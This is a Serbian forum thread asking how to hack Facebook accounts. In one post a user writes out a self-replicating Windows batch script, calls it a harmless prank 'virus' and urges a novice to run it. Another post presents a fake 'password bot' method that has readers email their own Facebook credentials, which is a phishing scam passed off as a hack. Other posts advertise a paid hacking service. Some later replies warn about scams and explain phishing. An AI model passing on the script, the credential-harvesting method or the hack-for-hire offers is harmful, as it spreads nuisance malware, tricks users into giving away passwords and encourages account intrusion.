Danubius Forum ima trenutno preko 11 000 registrovanih korisnika
REGISTRUJTE SE , jer ovako ne možete čitati ni 30 % sadržaja
niti možete učestvovati u radu foruma .VIDITE SVE -ali ne i sadržaj topica (a imamo ih preko 7000 !)
Registracija je krajnje jednostavna , BEZ maila ZA POTVRDU . Možete odmah ući na forum pošto ste uneli nick i pass.
DOBRO NAM DOŠLI !
DANUBIUS FORUM @ osnovano 2007 -
Danubius Forum ima trenutno preko 11 000 registrovanih korisnika
REGISTRUJTE SE , jer ovako ne možete čitati ni 30 % sadržaja
niti možete učestvovati u radu foruma .VIDITE SVE -ali ne i sadržaj topica (a imamo ih preko 7000 !)
Registracija je krajnje jednostavna , BEZ maila ZA POTVRDU . Možete odmah ući na forum pošto ste uneli nick i pass.
DOBRO NAM DOŠLI !
Would you like to react to this message? Create an account in a few clicks or log in to continue.
-MI NISMO KAO DRUGI -Liberté, égalité, fraternité-
Naslov: Kako hakovati FaceBook?? Ned Jun 13, 2010 9:01 pm
First topic message reminder :
Da li neko zna kako hakovati FaceBook??
Autor
Poruka
Gost Gost
Naslov: Re: Kako hakovati FaceBook?? Pon Jul 04, 2011 2:45 am
Hvala ti za objašnjenje. Ja se ne kužim u kompjutere i znam ga samo koristiti,ali o nekim stručnim stvarima iskreno pojma nemam,pa zato i pitam. Znači ostaje mi samo nada da će moj kompjuter i nadalje biti "živ i zdrav"..:) Još jednom hvala ti.
golubaca
Datum upisa : 04.07.2011
Naslov: Re: Kako hakovati FaceBook?? Pon Jul 04, 2011 2:48 am
da bih ti slikovito objasnio,napisacu ti "virus" koji naravno nije destruktivan,ali ume da iznervira coveka :) slobodno to uradi,ja ti garantujem,nece ti nista biti,samo ce sebe kopirati mnogo puta,i naravno otvarati se kao nenormalan,ali bices siguran ne brini se :) nece se sam aktivirati,ako zelis da ga prekines restatuj komp ili sacekaj da sam stane,kada upalis opet komp nece se sam startovati,a zatim izbrises datoteku gde se replicirao :)
golubaca
Naslov: Re: Kako hakovati FaceBook?? Pon Jul 04, 2011 2:49 am
da bih ti slikovito objasnio,napisacu ti "virus" koji naravno nije destruktivan,ali ume da iznervira coveka :) slobodno to uradi,ja ti garantujem,nece ti nista biti,samo ce sebe kopirati mnogo puta,i naravno otvarati se kao nenormalan,ali bices siguran ne brini se :) nece se sam aktivirati,ako zelis da ga prekines restatuj komp ili sacekaj da sam stane,kada upalis opet komp nece se sam startovati,a zatim izbrises datoteku gde se replicirao :)
golubaca
Naslov: Re: Kako hakovati FaceBook?? Pon Jul 04, 2011 2:56 am
a da,nisam napisao ono najbitnije :) otvori notepad i napisi sledece: @echo off md aca copy %0 aca cd aca start aca.bat end
sacuvaj ovo kao aca.bat i proveri ga antivirusom,videces da nece nista naci,a zatim startuj :) ume da izludi coveka,ali moja preporuka,obrisi ga kad zavrsis da ga ne bi slucajno opet aktivirao :) ne moras me poslusati,ali ovo sam napisao da bi imao neku sliku o tome da i antivirusi ne pomazu :)
Gost Gost
Naslov: Re: Kako hakovati FaceBook?? Pon Jul 04, 2011 3:02 am
Hvala ti još jednom! Laku noć svima
AstrinaKomsinica Master Spamer
Datum upisa : 22.01.2011
Naslov: Re: Kako hakovati FaceBook?? Pon Jul 04, 2011 3:35 am
Dzaba sve ako se neko nameracio da ti provali u komp. Iz iskustva. E sad, na nama je da li cemo se zivcirati zbog toga, ili se malo zabaviti s tim:)
The_General_Tz
Datum upisa : 25.01.2012
Naslov: Re: Kako hakovati FaceBook?? Sre Jan 25, 2012 10:01 pm
Gost ::
Hvala ti za objašnjenje. Ja se ne kužim u kompjutere i znam ga samo koristiti,ali o nekim stručnim stvarima iskreno pojma nemam,pa zato i pitam. Znači ostaje mi samo nada da će moj kompjuter i nadalje biti "živ i zdrav"..:) Još jednom hvala ti.
Pokusaj sa malwarebytes programom malo ce potpomoci tvoj antivirus ali nista nije sigurno...barem ce antivirus imati manje propusta
pass_hacker83^pro
Datum upisa : 13.02.2012
Naslov: Re: Kako hakovati FaceBook?? Pon Feb 13, 2012 4:28 pm
Pa, slazem se sa Boksshom ali,
Ja nisam haker nego klasican programer, s'tim da znam nekoliko caki, koje sam sam napravio ili cuo od prijatelja. (i ne znam zasto ih ne bi podijelijo sa ljudima jer, ne znam da cuvam tajne) Ima vise nacina da se hakuje profil, ali je po meni ovaj najprakticniji: -Idete u vas email i posaljete ovakvu poruku:
To: [You must be registered and logged in to see this link.] (to je PASSWORD-BOT koji vam automatski salje pasvord, nakon sto primi poruku. Cc: / Subject: Facebook_Hack_password_bot_Recoverypass. i u poruci ovako napisete: Vas email od facebooka -mora da bude tacan Vasu sifru od facebooka - | | - Email zrtve Jednog njegovog/njenog prijatelja -ime mora biti tacno
Kada to posaljete ne smijete biti na facebook-u inace nece uspjeti. Ako je poruka uspjesno poslata izgasite pretrazivac i sacekajte 2-3 minuta. I to bi bilo to.
P.S: JA SAM SAMO OBICAN PROGRAMER I NE ODGOVARAM ZA POSLjEDICE (SVADJE SA ZRTVAMA ITD). PREPORUCIJEM VAM DE NE RADITE OVO JER, TO JE IPAK SAMO FB PROFIL....
Hestija
Datum upisa : 21.01.2012
Naslov: Re: Kako hakovati FaceBook?? Pon Feb 13, 2012 6:01 pm
Ama smarate vise sa tim! Samo bolesnik to moze da radi, osoba koja nema svoj zivot!
ANDJEO82
Location : Iznad vaseg ramena@@@ Humor : Andjeoski @ Datum upisa : 13.11.2010
Naslov: Re: Kako hakovati FaceBook?? Pon Feb 13, 2012 6:32 pm
O ovoj temi je vec toliko stranica ispisano i sve lepo objasnjeno,celi postupak kako i sta se radi, da je zaista postalo dosadno.Cak su se i Oni o kojima Pisete Slatko Ismejali citajuci ove Nebuloze.... [You must be registered and logged in to see this image.]
haker
Datum upisa : 15.04.2012
Naslov: Re: Kako hakovati FaceBook?? Ned Apr 15, 2012 2:16 am
zizop ::
Da li neko zna kako hakovati FaceBook??
[You must be registered and logged in to see this link.] evo ti ovde lepo objasnjenje
whiteangels
Datum upisa : 11.05.2012
Naslov: Izuzetno ste ozbiljni....Uplatih vam novac,i nista....Cak mi na na poruke ne odgovarate...Stvarno nema smisla,uzimate ljudima novac dzabe...Ako se vec plati uradite to za sta uzimate pare! Pet Maj 11, 2012 2:40 am
BlackZero ::
Hakovanje facebook-a je na sajtu: [You must be registered and logged in to see this link.] Ili pogledajte klip na youtube i vidite koliko smo ozbiljni. link: [You must be registered and logged in to see this link.] Ko je zainteresovan moze da se javi i pita ili zahteva neki hack.
BHREIA
Datum upisa : 15.09.2012
Naslov: Re: Kako hakovati FaceBook?? Sub Sep 15, 2012 7:37 pm
I sta kazes whiteangels, start.pirat3.com je cista prevara? Ili da ti nisi u medjuvremenu dali lozinku?
sisilopez
Datum upisa : 16.12.2012
Naslov: Re: Kako hakovati FaceBook?? Ned Dec 16, 2012 6:43 pm
Ljudi ne nasedajte na ove prevarante! [You must be registered and logged in to see this link.] Kao ozbiljni su,al za uzimanje para i za prevaru. Mozete im uplatiti i NISTA! Legnu pare na racun,a oni nece da vam prikazu podatke. CISTA PREVARA! Navlakusa!
Naslov: Re: Kako hakovati FaceBook?? Ned Dec 16, 2012 6:50 pm
sisilopez ::
Ljudi ne nasedajte na ove prevarante! [You must be registered and logged in to see this link.] Kao ozbiljni su,al za uzimanje para i za prevaru. Mozete im uplatiti i NISTA! Legnu pare na racun,a oni nece da vam prikazu podatke. CISTA PREVARA! Navlakusa!
draga ne nasedamo..mi samo zasedamo,navlačimo,razvlačimo...mesimo...i ostalo... [You must be registered and logged in to see this image.].. u svakom slučaju hvala.... [You must be registered and logged in to see this image.]..i dobro nam došla...
-MI NISMO KAO DRUGI -Liberté, égalité, fraternité
Nekad tako komplikovana,a tako jednostavna,ali uvek jedinstvena ღ.
Every girl can be a Princess and a Warrior. 👑
sisilopez
Datum upisa : 16.12.2012
Naslov: Re: Kako hakovati FaceBook?? Ned Dec 16, 2012 7:22 pm
Hvala za dobrodoslicu :) Al trebalo bi brisati postove ovih koji nude kojekakve usluge za pare. Moja drugarica im uplatila i ispalili je. Nisu to neke pare,al ipak prevara je prevara.
Naslov: Re: Kako hakovati FaceBook?? Ned Dec 16, 2012 7:25 pm
sisilopez ::
Hvala za dobrodoslicu :) Al trebalo bi brisati postove ovih koji nude kojekakve usluge za pare. Moja drugarica im uplatila i ispalili je. Nisu to neke pare,al ipak prevara je prevara.
Ne brini..neće niko da nasedne...Ako i nasedne,jednom će..I to će mu biti dobra lekcija.Gledaj to malo s pozitivne strane:)
dusan duki
Datum upisa : 25.01.2013
Naslov: kako hakovati face bok profil Pet Jan 25, 2013 3:09 pm
kako hakovati face bok profil bez programa ili mi recite gde mogu skinuti program
Naslov: Re: Kako hakovati FaceBook?? Pet Jan 25, 2013 3:15 pm
AstrinaKomsinica ::
Ako te zanima Kijarina, dacu ti ja pass, da se ne mucis [You must be registered and logged in to see this image.]
pa jbt. ljudi dođu sa svakakvim idejama.. [You must be registered and logged in to see this image.]... glupost je neuništiva... ja se mučim na farmi.. klik..klik..i da mi neko otme treći profil... [You must be registered and logged in to see this image.].strašno..
Bane Bumbar Buntovnik bez razloga
Naslov: Re: Kako hakovati FaceBook?? Pet Jan 25, 2013 3:27 pm
Hakovanje fejsa OMG :329340:
Inače dok smo na farmi .... [You must be registered and logged in to see this image.]
"Još jednom mi pošalji zahtev za farmville i zapalicu ti farmu i poklacu ti zivotinje"
Naslov: Re: Kako hakovati FaceBook?? Uto Jan 20, 2015 1:38 am
Lily ::
Bem mu i hak.. ja nidje ne nadje na temi da je taja odgovorio mojoj Bosni.. a lepo trazila od njeg' uslugu..
ova tema sva ispamovana i ostale crne kocke..
ovo zrelo za brisanje.. naučili smo tri pojma.dosta:D
Lily First Bride
Godina : 28 Location : .. majka Serbia.. Datum upisa : 12.09.2008
Naslov: Re: Kako hakovati FaceBook?? Uto Jan 20, 2015 1:51 am
Hahahahaa.. de ba brisi dok jos nisam dobilaa pozdravni ban od taje zbog radi spama.. kisko..
ZoxZoja Stela Polaris
Godina : 56 Location : Plava Planeta Datum upisa : 13.01.2013
Naslov: Re: Kako hakovati FaceBook?? Uto Jan 20, 2015 1:55 am
To što svi važno zovete hakovanjem je najobičnije pecanje. Računa sena ljudsku glupost ili bar nepažnju. Sami date svoje podatke "pecarošu" koji zamišlja da je veliki haker.
Jeste jednom se i meni desilo da sam nasela. Trenutak nepažnje i nasela na foru aj mi lajkuj sliku nagradna igra je u pitanju bla bla bla. prebaci me na stranicu (identična FB) gde mi traži logovanje i ja (budala neopevana i nepažljiva) ladno im dam lozinku. Srećom u momentu trenutka shvatim šta sam uradila, zahtevam novu ozinku, promenim i povratim svoj nalog. Od tad ne igram više poker jer su mi maknuli par miliona čipova.
Dakle manite se klinačkih fazona "hakovali mi fb" jer niste hakovani nego ste ispali glupi. O onima koji bi da "hakuju" nečiji fb nalog tek neću da trošim reči. To je ne klinački nego ljigavo.
Inače za one koji se ipak boje "hakovanja" fb profila osnovno pravilo je pazi na šta klikaš. Svaki link na chatu pitaj šta je. Ako je "glasanje" ladno kažeš - izvini ne glasam iz inboxa. Kome se ne sviđa nek te obriše.